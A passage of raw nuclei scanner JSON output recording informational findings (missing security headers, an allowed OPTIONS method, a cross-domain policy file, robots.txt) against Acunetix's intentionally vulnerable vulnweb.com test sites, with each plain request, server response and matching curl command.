\\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:49.962352603Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:50.555870431Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/clientaccesspolicy.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/clientaccesspolicy\",\"template-id\":\"clientaccesspolicy\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/clientaccesspolicy.yaml\",\"info\":{\"name\":\"Silverlight cross-domain policy\",\"author\":[\"emadshanab\"],\"tags\":[\"miscellaneous\",\"misc\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com/clientaccesspolicy.xml\",\"request\":\"GET /clientaccesspolicy.xml HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 307\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: text/xml\\r\\nDate: Wed, 13 Nov 2024 02:43:26 GMT\\r\\nEtag: \\\"5049b03d-133\\\"\\r\\nLast-Modified: Fri, 07 Sep 2012 08:28:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?\\u003e\\r\\n\\u003caccess-policy\\u003e\\r\\n\\t\\u003ccross-domain-access\\u003e\\r\\n \\u003c!--\\r\\n\\t\\t\\u003callow-from http-request-headers=\\\"*\\\"\\u003e\\r\\n\\t\\t\\t\\u003cdomain uri=\\\"*\\\"/\\u003e\\r\\n\\t\\t\\u003c/allow-from\\u003e\\r\\n --\\u003e \\r\\n\\t\\t\\u003cgrant-to\\u003e\\r\\n\\t\\t\\t\\u003cresource path=\\\"/\\\" include-subpaths=\\\"true\\\"/\\u003e\\r\\n\\t\\t\\u003c/grant-to\\u003e\\r\\n\\t\\u003c/cross-domain-access\\u003e\\r\\n\\u003c/access-policy\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:43:26.53620974Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11' 'http://testphp.vulnweb.com/clientaccesspolicy.xml'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/options-method.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/options-method\",\"template-id\":\"options-method\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/options-method.yaml\",\"info\":{\"name\":\"Allowed Options Method\",\"author\":[\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"extracted-results\":[\"OPTIONS, TRACE, GET, HEAD, POST\"],\"request\":\"OPTIONS / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Edg/100.0.1185.29\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nAllow: OPTIONS, TRACE, GET, HEAD, POST\\r\\nDate: Wed, 13 Nov 2024 02:43:29 GMT\\r\\nPublic: OPTIONS, TRACE, GET, HEAD, POST\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\nContent-Length: 0\\r\\n\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:33.493650506Z\",\"curl-command\":\"curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Edg/100.0.1185.29' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/options-method.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/options-method\",\"template-id\":\"options-method\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/options-method.yaml\",\"info\":{\"name\":\"Allowed Options Method\",\"author\":[\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"extracted-results\":[\"OPTIONS, TRACE, GET, HEAD, POST\"],\"request\":\"OPTIONS / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nAllow: OPTIONS, TRACE, GET, HEAD, POST\\r\\nDate: Wed, 13 Nov 2024 02:43:29 GMT\\r\\nPublic: OPTIONS, TRACE, GET, HEAD, POST\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\nContent-Length: 0\\r\\n\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:33.500433892Z\",\"curl-command\":\"curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/options-method.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/options-method\",\"template-id\":\"options-method\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/options-method.yaml\",\"info\":{\"name\":\"Allowed Options Method\",\"author\":[\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"extracted-results\":[\"OPTIONS, TRACE, GET, HEAD, POST\"],\"request\":\"OPTIONS /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nAllow: OPTIONS, TRACE, GET, HEAD, POST\\r\\nDate: Wed, 13 Nov 2024 02:43:29 GMT\\r\\nPublic: OPTIONS, TRACE, GET, HEAD, POST\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\nContent-Length: 0\\r\\n\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:33.522598579Z\",\"curl-command\":\"curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/options-method.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/options-method\",\"template-id\":\"options-method\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/options-method.yaml\",\"info\":{\"name\":\"Allowed Options Method\",\"author\":[\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T\",\"extracted-results\":[\"OPTIONS, TRACE, GET, HEAD, POST\"],\"request\":\"OPTIONS /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36 Edg/93.0.967.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nAllow: OPTIONS, TRACE, GET, HEAD, POST\\r\\nDate: Wed, 13 Nov 2024 02:43:29 GMT\\r\\nPublic: OPTIONS, TRACE, GET, HEAD, POST\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\nContent-Length: 0\\r\\n\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:33.523556557Z\",\"curl-command\":\"curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36 Edg/93.0.967.0' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/robots-txt-endpoint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/robots-txt-endpoint\",\"template-id\":\"robots-txt-endpoint\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/robots-txt-endpoint.yaml\",\"info\":{\"name\":\"robots.txt endpoint prober\",\"author\":[\"caspergn\",\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":2}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/robots.txt\",\"request\":\"GET /robots.txt HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 13\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: text/plain\\r\\nDate: Wed, 13 Nov 2024 02:43:30 GMT\\r\\nEtag: \\\"3629faa394d51:0\\\"\\r\\nLast-Modified: Mon, 06 May 2019 12:45:52 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\nUser-agent: *\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:34.503970832Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testasp.vulnweb.com/robots.txt'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/robots-txt-endpoint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/robots-txt-endpoint\",\"template-id\":\"robots-txt-endpoint\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/robots-txt-endpoint.yaml\",\"info\":{\"name\":\"robots.txt endpoint prober\",\"author\":[\"caspergn\",\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":2}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com/robots.txt\",\"request\":\"GET /robots.txt HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 13\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: text/plain\\r\\nDate: Wed, 13 Nov 2024 02:43:30 GMT\\r\\nEtag: \\\"3629faa394d51:0\\\"\\r\\nLast-Modified: Mon, 06 May 2019 12:45:52 GMT\\r\\nServer: 